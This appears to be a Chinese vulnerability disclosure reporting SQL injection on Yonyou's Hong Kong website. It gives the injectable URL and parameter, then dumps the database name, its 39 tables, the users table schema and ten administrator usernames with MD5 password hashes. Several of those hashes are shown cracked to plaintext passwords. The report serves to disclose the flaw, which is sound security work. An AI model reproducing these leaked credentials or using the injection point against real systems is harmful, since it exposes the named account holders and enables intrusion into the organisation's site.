RootSSV:93316用友香港官网存在注入导致帐号密码泄漏
简要描述:
注入点:www.yonyou.com.hk/new/download_view.php?uid=4
详细说明:
2.数据库:db1007112_ufida中39个表
Database: db1007112_ufida
[39 tables]
±------------------------+
| admin_log |
| adpic |
| app_cat |
| app_company |
| app_file |
| app_fileImage |
| app_fileItem |
| app_log |
| app_login |
| app_partner |
| app_staff |
| banner |
| banner_2013 |
| banner_home_2013 |
| content_2013 |
| content_other_2013 |
| content_sub_2013 |
| down_file |
| downform |
| downform_2013 |
| download_2013 |
| downlog |
| downone |
| guestbook |
| info |
| menu |
| onepage |
| qikan |
| qksort |
| resources_download_2013 |
| resources_menu_2013 |
| sessions |
| sort |
| stats |
| support_2013 |
| tongji |
| userlog |
| users |
| video |
±------------------------+
3.用户表中12个列,Table: users
[12 columns]
±------------±--------------------+
| Column | Type |
±------------±--------------------+
| action_list | text |
| create_time | datetime |
| creater | varchar(32) |
| email | varchar(60) |
| nav_list | text |
| password | varchar(32) |
| phone | varchar(11) |
| status | tinyint(1) unsigned |
| tel | varchar(11) |
| true_name | varchar(60) |
| users_id | tinyint(6) unsigned |
| users_name | varchar(60) |
±------------±--------------------+
漏洞证明:
Table: users
[10 entries]
±-----------±--------------------------------------------+
| users_name | password |
±-----------±--------------------------------------------+
| admin | 7bd90338e9640b6707ed8689a4bd929a |
| howard | dc5ab2b32d9d78045215922409541ed7 (howard) |
| lawrence | e02d90ea127f923d273786d055b6208e (lawrence) |
| tianye | 4ebc55777a60faaaf170c00f16a4b64e |
| louis | 777cadc280bb23ebea268ded98338c39 (louis) |
| andy | da41bceff97b1cf96078ffb249b3d66e (andy) |
| jessica | aae039d6aa239cfc121357a825210fa3 (jessica) |
| johnny | f4eb27cea7255cea4d1ffabf593372e8 (johnny) |
| liudong | 505a17b64f7e6f72bbc494338a7a1764 |
| imadmin | cf0ff09ef02ae82a9e660e768de567e3 |
±-----------±--------------------------------------------+